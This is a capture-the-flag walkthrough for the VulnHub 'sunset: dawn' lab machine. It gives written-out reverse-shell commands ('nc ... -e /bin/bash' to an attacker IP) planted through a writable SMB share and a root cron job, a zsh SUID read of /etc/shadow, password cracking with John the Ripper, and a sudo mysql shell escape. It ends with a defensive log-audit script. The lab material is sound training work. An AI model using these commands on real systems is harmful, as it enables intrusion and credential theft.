https://www.vulnhub.com/entry/sunset-dawn,341/

System Info

  • Debian 10

Discover Target IP

  • sudo nmap -sn 192.168.122.1-255

Scan Ports

  • nmap -p- 192.168.122.11
  • nmap -p 80,139,445,3306 -sC -sV 192.168.122.11
  • enum4linux -a 192.168.122.11

Port 80

  • robots.txt does not exist
  • using dirb http://192.168.122.11 we can find http://192.168.122.11/logs/
  • we can download management.log from it and take a look

SMB server

  • ports 139 and 445 indicate that there is an SMB server on the target machine
  • smbclient -L //dawn lists all of its services, and among them we find the shared disk ITDEPT
  • we can log into it with smbclient //dawn/ITDEPT
  • now we are in the SMB share, but it is empty
  • if we go back to that management.log, we can find lines like
...
2022/11/08 13:29:02 CMD: UID=0    PID=666    | /usr/sbin/CRON -f 
2022/11/08 13:29:02 CMD: UID=0    PID=669    | chmod 777 /home/dawn/ITDEPT/web-control 
2022/11/08 13:30:01 CMD: UID=0    PID=671    | /usr/sbin/cron -f 
2022/11/08 13:30:01 CMD: UID=0    PID=670    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=675    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=674    | /usr/sbin/cron -f 
2022/11/08 13:30:01 CMD: UID=0    PID=673    | /usr/sbin/cron -f 
2022/11/08 13:30:01 CMD: UID=0    PID=672    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=676    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=677    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=678    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=682    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=0    PID=681    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/11/08 13:30:01 CMD: UID=1000 PID=680    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/11/08 13:30:01 CMD: UID=0    PID=679    | /usr/sbin/CRON -f 
2022/11/08 13:30:01 CMD: UID=33   PID=685    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/11/08 13:30:01 CMD: UID=???  PID=684    | ???
...

which indicates that there are cron jobs running every few minutes that change the permissions of ~/ITDEPT/web-control and ~/ITDEPT/product-control to 777 and then run them through a shell as UID=33 and UID=1000 respectively; the former is probably a daemon user like www-data and the latter is a regular user on the target system. Because root makes the scripts world-writable before they run, anyone who can write to the share controls what those cron jobs execute.

Reverse shell

  • we can create our own web-control and product-control bash scripts and put nc -nv 192.168.122.101 9393 -e /bin/bash into them to open a reverse shell
  • connect to the SMB share and upload the file with put product-control
  • exit the share, open a listening port on the attacker's machine with ncat -nvlp 9393 and just wait

Exploring the system

  • now we have a reverse shell as user dawn; spawn a better shell with python3 -c 'import pty;pty.spawn("/bin/bash")'
  • if we search for all files that belong to root and have the SUID bit set, find / -user root -perm -4000 -type f 2>/dev/null, we find some binaries that a normal user can run with root permissions

Privilege Escalation

  • just running zsh will give us root

/usr/bin/zsh

  • if we check https://gtfobins.github.io/gtfobins/zsh/#file-read, there is a way to read restricted files using zsh
  • export LFILE=/etc/shadow stores the path of /etc/shadow in the environment variable LFILE
  • now we can read it using zsh -c 'echo "$(<$LFILE)"'
  • we can redirect its output into another file with zsh -c 'echo "$(<$LFILE)"' > shadowfile
  • get it back to the attacker's machine by starting an HTTP server or by moving it into the ~/ITDEPT/ SMB shared directory
  • we also need a copy of /etc/passwd

Cracking passwords

  • now that we have both the /etc/passwd and /etc/shadow files of the target system, we can try to crack them
  • but first we need to combine both files using unshadow passwd shadowfile > unshadowed
  • then we can crack it using John the Ripper; john unshadowed --show prints the cracked credentials

Rooting the system

  • now we can log in as ganimedes with the password sunshine
  • check their home directory: in their .bash_history file we can find a passphrase like thisisareallysecurepasswordnooneisgoingtoeverfind
  • if we try it on other users, we can log in as root!

MySQL

  • running sudo -l shows
...
User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
  • if we take a look at user dawn's bash history file, we can find a line like this
...
echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
...
  • it looks like a hashed password; hashid or hash-identifier tells us it is MD5 Crypt
  • we can try to crack it using John the Ripper with a bigger wordlist, rockyou
john dawn.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt

and we get dawn's password, onii-chan29.

  • now we can use MySQL to execute bash as root, entering dawn's password when prompted
sudo mysql -u root -p -e '\! /bin/bash'
  • now we are root

Phobos

  • if we take a look at management.log again, we can find another cron job, pointing at a file under user ganimedes' home directory and executed by root (UID=0)
...
2022/11/11 15:02:01 CMD: UID=0    PID=1501   | /bin/sh -c /home/ganimedes/phobos 
...

and the file phobos doesn't exist yet, so we can create our own reverse shell script there and cron will run it as root, connecting back to us

echo "nc -nv 192.168.122.101 9123 -e /bin/bash" > phobos && chmod +x phobos
  • open a listening port on the attacker's machine with ncat -nvlp 9123
  • now we have a root shell
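Both of the cron weaknesses this box relies on (the ITDEPT scripts that root chmods to 777 before they run, and the root cron job pointing at a missing file under /home/ganimedes) can be spotted by scanning a pspy-style process log like management.log. The following is an added example, not part of the original walkthrough: it parses lines in the format quoted above and flags scripts that were made world-writable and then executed, plus any script under /home that root executes. The sample lines are copied from the log excerpts on this page.

```python
# Added example (not part of the original walkthrough): audit a pspy-style
# process log such as management.log for two risky cron patterns:
#   1. a chmod 777 on a script that cron later executes (any user can replace it)
#   2. root executing a script that lives under /home (a user-controlled path)
import re
from typing import Dict, List

# Shape: "2022/11/08 13:30:01 CMD: UID=0    PID=681    | /bin/sh -c chmod 777 /path"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\S+)\s+PID=(?P<pid>\S+)\s+\| (?P<cmd>.*)$")
CHMOD_RE = re.compile(r"chmod\s+(?:777|[ao]\+w)\s+(?P<path>\S+)")
EXEC_RE = re.compile(r"^/bin/(?:ba)?sh -c (?P<path>/\S+)$")


def parse(lines: List[str]) -> List[Dict[str, str]]:
    """Return one dict per well-formed log line; '...' and garbled lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def audit(lines: List[str]) -> List[Dict[str, str]]:
    """Flag world-writable-then-executed scripts and root-run scripts under /home."""
    events = parse(lines)
    # Paths that some process made world-writable at any point in the log
    writable = {m.group("path") for ev in events if (m := CHMOD_RE.search(ev["cmd"]))}
    findings = []
    for ev in events:
        m = EXEC_RE.match(ev["cmd"])
        if not m:
            continue
        path, uid = m.group("path"), ev["uid"]
        if path in writable:
            findings.append({"kind": "world-writable-script-executed", "path": path, "uid": uid})
        if uid == "0" and path.startswith("/home/"):
            findings.append({"kind": "root-executes-home-script", "path": path, "uid": uid})
    return findings


# Constructed sample: the relevant lines from the log excerpts quoted on this page.
SAMPLE = """2022/11/08 13:29:02 CMD: UID=0    PID=669    | chmod 777 /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=0    PID=681    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=1000 PID=680    | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/11/08 13:30:01 CMD: UID=33   PID=685    | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/11/08 13:30:01 CMD: UID=???  PID=684    | ???
2022/11/11 15:02:01 CMD: UID=0    PID=1501   | /bin/sh -c /home/ganimedes/phobos
...""".splitlines()

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['kind']}: {f['path']} (run as UID {f['uid']})")
```

Run against the real management.log it reports the two ITDEPT scripts and the phobos job; the fix on the defending side is to keep cron targets owned by root and not writable by anyone else, never under a user's home.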

Capture The Flag

  • cat /root/flag.txt